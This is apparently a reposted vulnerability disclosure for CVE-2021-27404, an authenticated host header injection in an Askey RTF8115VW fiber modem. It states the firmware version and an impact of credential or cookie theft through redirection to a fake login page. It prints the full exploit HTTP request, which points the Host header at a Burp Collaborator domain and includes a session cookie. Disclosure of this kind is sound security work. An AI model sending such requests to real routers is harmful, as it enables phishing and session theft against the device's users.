# CVE-2021-27404 Authenticated Host標頭注入漏洞
==INFO==
**Authenticated Host Header Injection - Askey Internet Fiber Modem** Vendor: **Askey** Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014** Model: **RTF8115VW** Vulnerable Header: **Host** Not tested in other model/version. Impact: An attacker could take advantege on that vulnerability to redirect user to a fake Login page in order to extract his credentials, or cookies. The Final Request ``` GET / HTTP/1.1 Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236 Upgrade-Insecure-Requests: 1 Referer: http://x.x.x.x/cgi-bin/te_logout.cgi Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Connection: close Cache-Control: max-age=0 Accept-Encoding: gzip, deflate ``` ![Alt text](/hostHeaderInjection.jpg?raw=true "Optional Title")
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容